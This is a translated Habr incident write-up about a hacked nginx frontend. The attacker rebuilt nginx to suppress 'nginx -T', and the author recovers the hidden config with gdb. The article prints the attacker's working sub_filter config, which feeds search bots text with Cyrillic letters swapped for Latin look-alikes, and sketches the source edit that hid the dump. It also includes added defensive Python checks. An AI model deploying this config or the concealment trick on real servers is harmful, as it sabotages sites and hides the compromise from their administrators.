When 'а' is not equal to 'a'. On the trail of a hack

A very unpleasant story happened to one of my friends. But as unpleasant as it was for Mikhail, it was just as entertaining for me.

I should say that my friend is quite a capable UNIX user: he can install the system himself, install mysql and php, and do simple nginx configuration.
He also has a dozen or a dozen and a half sites dedicated to construction tools.

One of these sites, dedicated to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review site, but someone has made a habit of attacking it: now DDoS, now brute force, now obscene comments and abuse reports sent to the hosting provider and to RKN.
Suddenly everything went quiet, and this calm did not feel right, and the site began to slide gradually from the top lines of the search results.

That was the preamble; what follows is the admin story itself.

It was getting close to bedtime when the phone rang: “San, could you take a look at my server? It seems to me that I've been hacked. I can't prove it, but the feeling hasn't left me for the third week now. Maybe it's just time for me to get treated for paranoia?”

A half-hour discussion followed, which can be summarized as follows:

  • the ground for a break-in was quite fertile;
  • the attacker could have obtained superuser rights;
  • the attack (if it happened) was aimed specifically at this site;
  • the problem areas have been fixed, and all that remains is to understand whether an intrusion actually took place;
  • the hack could not have touched the site code or the databases.

Regarding the last point.

Only the white (public) IP of the frontend faces the world. There is no exchange between the backends and the frontend other than http(s), the users/passwords are different, and no keys were exchanged. On the gray (private) addresses, all ports except 80/443 are closed. The white IPs of the backends are known only to two users whom Mikhail trusts completely.

The frontend runs Debian 9, and by the time of the call the system had been isolated from the world by an external firewall and stopped.

“OK, give me access,” I say, deciding to put off sleep for an hour. “I'll see with my own eyes.”

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible break-in

I start the server, first in rescue mode. I mount the disks and leaf through the auth logs, the history, the system logs and so on; where possible I check file creation dates, although I understand that a normal attacker would have "swept up" after himself, and Misha had already "trampled" the scene considerably while searching on his own.

I boot in normal mode and, not yet really understanding what to look for, study the configs. I am mainly interested in nginx because, by and large, there is nothing on the frontend besides it.
The configs are small and well structured into a dozen files; I simply go through them with cat, one by one. Everything seems clean, but you never know whether I missed some include, so I'll produce a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I didn't get it: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joins the one about the listing: "Why such an ancient version of nginx?"

Moreover, the system believes that a newer version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Come on, I don't even know how that's done!
- OK, well, go to sleep...

Nginx has clearly been rebuilt, and the output of the "-T" listing is hidden for a reason. There is no longer any doubt about the break-in, and one could simply accept it and (since Misha had replaced the server with a new one anyway) consider the problem solved.
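A binary that reports 1.10.3 while dpkg records 1.14.2 is the kind of discrepancy a file-integrity check against the package manifest catches. The following is an added example, not from the original article: it checks files against dpkg-format md5sums lines, and the paths and file contents in demo() are constructed.

```python
import hashlib
import os
import tempfile


def md5_of(path):
    """Hex MD5 of a file, read in chunks."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_md5sums(manifest, root="/"):
    """Check files under root against dpkg-style lines: "<md5>  <relative path>"."""
    problems = []
    for line in manifest.splitlines():
        if not line.strip():
            continue
        expected, rel = line.split(None, 1)
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            problems.append((rel, "missing"))
        elif md5_of(path) != expected.lower():
            problems.append((rel, "modified"))
    return problems


def demo():
    """Constructed sample: a scratch root where one packaged file gets replaced."""
    files = {"usr/sbin/nginx": b"packaged binary", "usr/share/doc/README": b"docs"}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        manifest = "".join(
            "%s  %s\n" % (md5_of(os.path.join(root, rel)), rel) for rel in files)
        # Simulate a rebuilt binary dropped over the packaged one.
        with open(os.path.join(root, "usr/sbin/nginx"), "wb") as f:
            f.write(b"rebuilt binary")
        return verify_md5sums(manifest, root)


if __name__ == "__main__":
    print(demo())
```

On a Debian system the manifest lines live in /var/lib/dpkg/info/<package>.md5sums. Someone with root can edit that file as well, so take the manifest from a freshly downloaded package on a trusted machine.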

And indeed, once someone has obtained root rights, the only sensible thing to do is to reinstall the system, and there is little point in looking for what was wrong there. But this time curiosity beat sleep. How do we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

We look: the trace is clearly missing lines like

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "\n", 1

Out of interest, let's compare the results

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that this piece of code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was changed to:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so the "-T" listing is not displayed.

But how do we get to see our config?

If my idea is right and the problem is only in the variable ngx_dump_config, let's try to set it with gdb; fortunately the --with-cc-opt -g switch is present, and let's hope the -O2 optimization does not get in our way. At the same time, since I do not know how ngx_dump_config might be handled in case 'T':, we will not invoke that block, but will set the variable while going through case 't':

Why '-t' can be used just as well as '-T'

The if (ngx_dump_config) block is processed inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Naturally, if the code was changed in this part and not in case 'T':, my method will not work.

Test nginx.conf

After the problem had already been solved, it was established experimentally that the malware needs a minimal nginx config of the following form in order to work:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We will use it in the article for brevity.

Launching the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Step by step:

  • set a breakpoint on the main() function
  • run the program
  • change the value of the variable that controls the config output: ngx_dump_config=1
  • continue/finish the program

As you can see, the real config differs from ours. Let's pick the parasitic piece out of it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's go through what happens here, in order.

The yandex/google User-Agents are detected:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

The wordpress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who meet both of the above conditions

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the html page, Cyrillic 'о' is changed to Latin 'o' and Cyrillic 'а' to Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

That's right, the only subtlety is that 'а' != 'a', just as 'о' != 'o'.

Thus, instead of normal, 100% Cyrillic text, the search engine bots receive modified garbage diluted with Latin 'a' and 'o'. I won't presume to discuss how this affects SEO, but such a jumble of letters is unlikely to have a positive effect on positions in the search results.
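A detection sketch for the substitution described above, added here and not part of the original article: it lists the non-ASCII characters in a config dump with their Unicode names, and flags words in a served page that mix scripts. The function names and the sample word are assumptions made for the example; the config lines are taken from the dump on this page.

```python
import re
import unicodedata


def script_of(ch):
    """Coarse script label taken from the Unicode character name."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK"):
        if name.startswith(script):
            return script
    return None


def non_ascii_in_config(config_text):
    """(line number, char, Unicode name) for every non-ASCII char in a config dump."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        for ch in line:
            if ord(ch) > 127:
                hits.append((lineno, ch, unicodedata.name(ch, "UNKNOWN")))
    return hits


def mixed_script_words(text):
    """Words whose letters come from more than one script."""
    found = []
    for word in re.findall(r"[^\W\d_]+", text):
        scripts = {script_of(c) for c in word} - {None}
        if len(scripts) > 1:
            found.append(word)
    return found


# Lines from the config dump on this page, with the Cyrillic letters escaped.
CONFIG = (
    "map \u043e:$sign_user_agent:$sign_uri $sign_o\n"
    "{\n"
    "\u043e:1:0 o;\n"
    "default \u043e;\n"
    "}\n"
    "sub_filter '\u0430' $sign_a;\n"
)
# Constructed sample word, then the same word after the two substitutions.
ORIGINAL = "\u0431\u0435\u043d\u0437\u043e\u043f\u0438\u043b\u0430"
SERVED = ORIGINAL.replace("\u043e", "o").replace("\u0430", "a")

if __name__ == "__main__":
    print(non_ascii_in_config(CONFIG))
    print(mixed_script_words(ORIGINAL), mixed_script_words(SERVED))
```

Because this config rewrites responses only for matching User-Agent values, run mixed_script_words over the page body as a crawler receives it and compare with what a browser receives.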

What can I say: guys with imagination.


Source: www.habr.com
